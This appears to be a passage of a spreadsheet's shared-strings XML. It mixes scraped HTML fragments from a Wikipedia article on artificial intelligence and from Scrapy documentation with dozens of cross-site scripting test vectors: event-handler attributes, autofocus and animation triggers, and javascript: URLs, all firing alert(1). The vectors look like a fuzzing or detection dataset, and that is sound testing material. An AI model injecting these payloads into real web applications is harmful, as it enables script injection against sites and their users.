    <t>&lt;li&gt;&lt;a href="/wiki/Functionalism_(philosophy_of_mind)" title="Functionalism (philosophy of mind)"&gt;Functionalism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Social intelligence </t>
  </si>
  <si>
    <t>&lt;xmp onkeyup="alert(1)" contenteditable&gt;test&lt;/xmp&gt;</t>
  </si>
  <si>
    <t>&lt;article onmouseover="alert(1)"&gt;test&lt;/article&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">        &lt;div class="rst-content"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Learn how to pause and resume crawls for large spiders.&lt;/dd&gt;</t>
  </si>
  <si>
    <t>document.getElementsByName("")</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Knowledge_base" title="Knowledge base"&gt;Knowledge base &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;tbody id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/tbody&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li oncontextmenu="alert(1)"&gt;test&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Marvin_Minsky" title="Marvin Minsky"&gt;Marvin Minsky &lt;/a&gt; quote: &lt;a href="#CITEREFMinsky1967"&gt;Minsky 1967 &lt;/a&gt;, p.&amp;#160;2 quoted in &lt;a href="#CITEREFCrevier1993"&gt;Crevier 1993 &lt;/a&gt;, p.&amp;#160;109. &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="topics/media-pipeline.html"&gt;&lt;span class="doc"&gt;Downloading and processing files and images</t>
  </si>
  <si>
    <t>&lt;dd onkeypress="alert(1)" contenteditable&gt;test&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;cite style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/cite&gt;</t>
  </si>
  <si>
    <t>&lt;legend onmouseleave="alert(1)"&gt;test&lt;/legend&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;iframe style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;select draggable="true" ondragenter="alert(1)"&gt;test&lt;/select&gt;</t>
  </si>
  <si>
    <t>&lt;xmp id=x tabindex=1 onfocus=alert(1)&gt;&lt;/xmp&gt;</t>
  </si>
  <si>
    <t>&lt;noscript onkeypress="alert(1)" contenteditable&gt;test&lt;/noscript&gt;</t>
  </si>
  <si>
    <t>&lt;dialog onpointerup=alert(1)&gt;XSS&lt;/dialog&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"&gt;&lt;PARAM NAME="DataURL" VALUE="javascript:alert(1)"&gt;&lt;/OBJECT&gt; </t>
  </si>
  <si>
    <t>&lt;head ondblclick="alert(1)"&gt;test&lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;tbody onpointerover=alert(1)&gt;XSS&lt;/tbody&gt;</t>
  </si>
  <si>
    <t>&lt;table onblur=alert(1) tabindex=1 id=x&gt;&lt;/table&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFClark2015"&gt;Clark 2015 &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;img onpaste="alert(1)" contenteditable&gt;test&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;canvas style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/canvas&gt;</t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Main articles: &lt;a href="/wiki/Classifier_(mathematics)" class="mw-redirect" title="Classifier (mathematics)"&gt;Classifier (mathematics) &lt;/a&gt;, &lt;a href="/wiki/Statistical_classification" title="Statistical classification"&gt;Statistical classification &lt;/a&gt;, and &lt;a href="/wiki/Machine_learning" title="Machine learning"&gt;Machine learning &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;dl onmouseup="alert(1)"&gt;test&lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;dl onmousedown="alert(1)"&gt;test&lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;form onmouseover="alert(1)"&gt;test&lt;/form&gt;</t>
  </si>
  <si>
    <t>&lt;frame onclick="alert(1)"&gt;test&lt;/frame&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Understand Scrapy versioning and API stability.&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;template onmouseover="alert(1)"&gt;test&lt;/template&gt;</t>
  </si>
  <si>
    <t>&lt;abbr draggable="true" ondragstart="alert(1)"&gt;test&lt;/abbr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">  &lt;div role="contentinfo"&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;Ask or search questions in &lt;a class="reference external" href="https://stackoverflow.com/tags/scrapy"&gt;StackOverflow using the scrapy tag&lt;/a&gt;.&lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-183"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-183"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFLugerStubblefield2004" class="citation book"&gt;&lt;a href="/w/index.php?title=George_Luger&amp;amp;action=edit&amp;amp;redlink=1" class="new" title="George Luger (page does not exist)"&gt;Luger, George &lt;/a&gt;; &lt;a href="/w/index.php?title=William_Stubblefield&amp;amp;action=edit&amp;amp;redlink=1" class="new" title="William Stubblefield (page does not exist)"&gt;Stubblefield, William &lt;/a&gt; (2004). &lt;span class="cs1-lock-registration" title="Free registration required"&gt;&lt;a rel="nofollow" class="external text" href="https://archive.org/details/artificialintell0000luge"&gt;&lt;i&gt;Artificial Intelligence: Structures and Strategies for Complex Problem Solving &lt;/i&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFLugerStubblefield2004"&gt;Luger &amp;amp; Stubblefield 2004 &lt;/a&gt;, chpt. 3,4,6,8, &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Soar-160"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Soar_160-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;li onmouseenter="alert(1)"&gt;test&lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">      &lt;dl&gt;</t>
  </si>
  <si>
    <t>&lt;cite onmousedown="alert(1)"&gt;test&lt;/cite&gt;</t>
  </si>
  <si>
    <t>&lt;menuitem id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;a href="/wiki/Wikipedia:Pending_changes" title="Wikipedia:Pending changes"&gt;latest accepted revision &lt;/a&gt;,</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Evolutionary_data_mining" title="Evolutionary data mining"&gt;Evolutionary data mining &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-3 tocsection-67"&gt;&lt;a href="#Transhumanism"&gt;&lt;span class="tocnumber"&gt;8.5.2 </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=47" title="Edit section: Art"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t xml:space="preserve">          &lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;audio id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/audio&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;label draggable="true" ondragenter="alert(1)"&gt;test&lt;/label&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Statistical learning </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;span ondrop=alert(1) contenteditable&gt;drop here&lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;725–727 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;tt ondrop=alert(1) contenteditable&gt;drop here&lt;/tt&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFMaker2006" class="citation web"&gt;Maker, Meg Houston (2006). &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20070103222615/http://www.engagingexperience.com/2006/07/ai50_ai_past_pr.html"&gt;"AI@50: AI Past, Present, Future" &lt;/a&gt;. Dartmouth College. Archived from &lt;a rel="nofollow" class="external text" href="http://www.engagingexperience.com/2006/07/ai50_ai_past_pr.html"&gt;the original &lt;/a&gt; on 3 January 2007&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;16 October </t>
  </si>
  <si>
    <t>&lt;img onpointerout=alert(1)&gt;XSS&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFNRC1999"&gt;NRC 1999 &lt;/a&gt;, pp.&amp;#160;216–222 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;sup onpointerleave=alert(1)&gt;XSS&lt;/sup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Scientific+American&amp;amp;rft.atitle=Can+neural+network+computers+learn+from+experience%2C+and+if+so%2C+could+they+ever+become+what+we+would+call+%27smart%27%3F&amp;amp;rft.date=2018&amp;amp;rft_id=https%3A%2F%2Fwww.scientificamerican.com%2Farticle%2Fcan-neural-network-comput%2F&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFMcCorduck2004"&gt;McCorduck 2004 &lt;/a&gt;, pp.&amp;#160;243–252 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFNilsson1998"&gt;Nilsson 1998 &lt;/a&gt;, chpt. 10.1–2 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;big oncut="alert(1)" contenteditable&gt;test&lt;/big&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div style="padding:0em 0.25em"&gt; &lt;/div&gt;&lt;table class="nowraplinks navbox-subgroup" style="border-spacing:0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:7.5em"&gt;Ancient &lt;/th&gt;&lt;td class="navbox-list navbox-odd" style="text-align:left;border-left-width:2px;border-left-style:solid;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Open-source_software" title="Open-source software"&gt;Open-source model &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;div id="content" class="mw-body" role="main"&gt; &lt;a id="top"&gt;&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;var onpointerout=alert(1)&gt;XSS&lt;/var&gt;</t>
  </si>
  <si>
    <t>&lt;base onkeyup="alert(1)" contenteditable&gt;test&lt;/base&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;span style="display: inline-block; margin-left: 4px; width: 182px; vertical-align: middle;"&gt;&lt;a href="https://www.wikidata.org/wiki/Q11660" class="extiw" title="d:Q11660"&gt;Data &lt;/a&gt; from Wikidata </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;p id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;537–581 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h4&gt;&lt;span class="mw-headline" id="Cognitive_simulation"&gt;Cognitive simulation </t>
  </si>
  <si>
    <t>&lt;script oncopy="alert(1)" contenteditable&gt;test&lt;/script&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFLighthill1973"&gt;Lighthill 1973 &lt;/a&gt;. </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-86"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-86"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;command onmouseenter="alert(1)"&gt;test&lt;/command&gt;</t>
  </si>
  <si>
    <t>&lt;isindex ondblclick="alert(1)"&gt;test&lt;/isindex&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/xss&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Frame_problem" title="Frame problem"&gt;Frame problem &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;h1 onmousedown="alert(1)"&gt;test&lt;/h1&gt;</t>
  </si>
  <si>
    <t>url(javascript:alert(''))</t>
  </si>
  <si>
    <t>&lt;p&gt;Widespread use of artificial intelligence could have &lt;a href="/wiki/Unintended_consequences" title="Unintended consequences"&gt;unintended consequences &lt;/a&gt; that are dangerous or undesirable. Scientists from the &lt;a href="/wiki/Future_of_Life_Institute" title="Future of Life Institute"&gt;Future of Life Institute &lt;/a&gt;, among others, described some short-term research goals to see how AI influences the economy, the laws and ethics that are involved with AI and how to minimize AI security risks. In the long-term, the scientists have proposed to continue optimizing function while minimizing possible security risks that come along with new technologies.&lt;sup id="cite_ref-361" class="reference"&gt;&lt;a href="#cite_note-361"&gt;&amp;#91;350&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;q id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/q&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Ren%C3%A9_Descartes" title="René Descartes"&gt;René Descartes &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;article onbeforepaste="alert(1)" contenteditable&gt;test&lt;/article&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Talcott_Parsons" title="Talcott Parsons"&gt;Talcott Parsons &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;Maloof, Mark. &lt;a rel="nofollow" class="external text" href="http://people.cs.georgetown.edu/~maloof/cosc270.f17/cosc270-intro-handout.pdf"&gt;"Artificial Intelligence: An Introduction, p. 37" &lt;/a&gt; &lt;span class="cs1-format"&gt;(PDF) </t>
  </si>
  <si>
    <t>&lt;html onpaste="alert(1)" contenteditable&gt;test&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;embed onpointermove=alert(1)&gt;XSS&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;div onbeforecopy="alert(1)" contenteditable&gt;test&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;multicol id=x tabindex=1 onfocus=alert(1)&gt;&lt;/multicol&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;shadow id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Homeostasis" title="Homeostasis"&gt;Homeostasis &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFMoravec1988"&gt;Moravec 1988 &lt;/a&gt;, p.&amp;#160;3 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFNilsson1998"&gt;Nilsson 1998 &lt;/a&gt;, chpt. 15 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;ul id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/ul&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Non-deterministic_planning-113"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Non-deterministic_planning_113-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;span id="topics-index"&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Computational_mathematics" title="Computational mathematics"&gt;Computational mathematics &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;details onpointerup=alert(1)&gt;XSS&lt;/details&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Get Scrapy installed on your computer.&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;base onclick="alert(1)"&gt;test&lt;/base&gt;</t>
  </si>
  <si>
    <t>&lt;html id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;thead onbeforepaste="alert(1)" contenteditable&gt;test&lt;/thead&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Glossary_of_electrical_and_electronics_engineering" title="Glossary of electrical and electronics engineering"&gt;Electrical and electronics engineering &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;meter onbeforecopy="alert(1)" contenteditable&gt;test&lt;/meter&gt;</t>
  </si>
  <si>
    <t>&lt;meta draggable="true" ondrag="alert(1)"&gt;test&lt;/meta&gt;</t>
  </si>
  <si>
    <t>AI's immediate precursors:</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-320"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-320"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;th id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/th&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">          &lt;dd&gt;&lt;a href="/en/1.3/"&gt;1.3&lt;/a&gt;&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;script type="text/javascript" src="_static/readthedocs-data.js"&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;animatetransform onpointerdown=alert(1)&gt;XSS&lt;/animatetransform&gt;</t>
  </si>
  <si>
    <t>&lt;optgroup onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/optgroup&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Model_of_computation" title="Model of computation"&gt;Model of computation &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;summary draggable="true" ondragleave="alert(1)"&gt;test&lt;/summary&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h2&gt;&lt;span class="mw-headline" id="Tools"&gt;Tools </t>
  </si>
  <si>
    <t>&lt;time onpointerdown=alert(1)&gt;XSS&lt;/time&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">             &lt;a href="https://github.com/scrapy/scrapy/blob/2.0/docs/index.rst" class="fa fa-github"&gt; Edit on GitHub&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;legend id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/legend&gt;</t>
  </si>
  <si>
    <t>&lt;figure onbeforecopy="alert(1)" contenteditable&gt;test&lt;/figure&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;header ondragover=alert(1) contenteditable&gt;drop here&lt;/header&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Semantics_(computer_science)" title="Semantics (computer science)"&gt;Semantics &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>="javascript:alert('')</t>
  </si>
  <si>
    <t>&lt;table onmouseenter="alert(1)"&gt;test&lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;b onpointerleave=alert(1)&gt;XSS&lt;/b&gt;</t>
  </si>
  <si>
    <t>&lt;ol onpointermove=alert(1)&gt;XSS&lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;dialog ondblclick="alert(1)"&gt;test&lt;/dialog&gt;</t>
  </si>
  <si>
    <t>&lt;image src=validimage.png onloadend=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;em style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/em&gt;</t>
  </si>
  <si>
    <t>&lt;xss id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/xss&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;spacer id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/spacer&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;slot style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/slot&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;header style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/header&gt;</t>
  </si>
  <si>
    <t>&lt;html id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/html&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;504–519, &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=O%27Reilly+Media&amp;amp;rft.atitle=The+state+of+AI+adoption&amp;amp;rft.date=2017-12-18&amp;amp;rft.aulast=Lorica&amp;amp;rft.aufirst=Ben&amp;amp;rft_id=https%3A%2F%2Fwww.oreilly.com%2Fideas%2Fthe-state-of-ai-adoption&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;Wallach, Introduction chapter. </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;big ondrop=alert(1) contenteditable&gt;drop here&lt;/big&gt;</t>
  </si>
  <si>
    <t>READTHEDOCS_DATA['page'] = "index"</t>
  </si>
  <si>
    <t>&lt;address onmouseenter="alert(1)"&gt;test&lt;/address&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFLeggHutter2007"&gt;Legg &amp;amp; Hutter 2007 &lt;/a&gt;. &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;samp onmouseup="alert(1)"&gt;test&lt;/samp&gt;</t>
  </si>
  <si>
    <t>&lt;nav onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/nav&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;dir id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/dir&gt;</t>
  </si>
  <si>
    <t>&lt;dir onpointerdown=alert(1)&gt;XSS&lt;/dir&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;table style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;rt ondrop=alert(1) contenteditable&gt;drop here&lt;/rt&gt;</t>
  </si>
  <si>
    <t>&lt;colgroup onmousemove="alert(1)"&gt;test&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFACM1998"&gt;ACM 1998 &lt;/a&gt;, ~I.2.3, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;select draggable="true" ondragleave="alert(1)"&gt;test&lt;/select&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-362"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-362"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Cryptography" title="Cryptography"&gt;Cryptography &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-321"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-321"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;frame draggable="true" ondragend="alert(1)"&gt;test&lt;/frame&gt;</t>
  </si>
  <si>
    <t>&lt;samp id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/samp&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;multicol style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/multicol&gt;</t>
  </si>
  <si>
    <t>&lt;td onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/td&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;head draggable="true" ondragend="alert(1)"&gt;test&lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;h1 id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/h1&gt;</t>
  </si>
  <si>
    <t>&lt;thead onmouseup="alert(1)"&gt;test&lt;/thead&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FOOTNOTEThro1993-140"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-FOOTNOTEThro1993_140-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:1%"&gt;Concepts &lt;/th&gt;&lt;td class="navbox-list navbox-even" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Reasoning, problem solving </t>
  </si>
  <si>
    <t>&lt;bdi onpointerleave=alert(1)&gt;XSS&lt;/bdi&gt;</t>
  </si>
  <si>
    <t>});</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/C._D._Broad" title="C. D. Broad"&gt;C. D. Broad &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=70" title="Edit section: See also"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;dialog id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/dialog&gt;</t>
  </si>
  <si>
    <t>&lt;button onpointerover=alert(1)&gt;XSS&lt;/button&gt;</t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="topics/extensions.html"&gt;&lt;span class="doc"&gt;Extensions</t>
  </si>
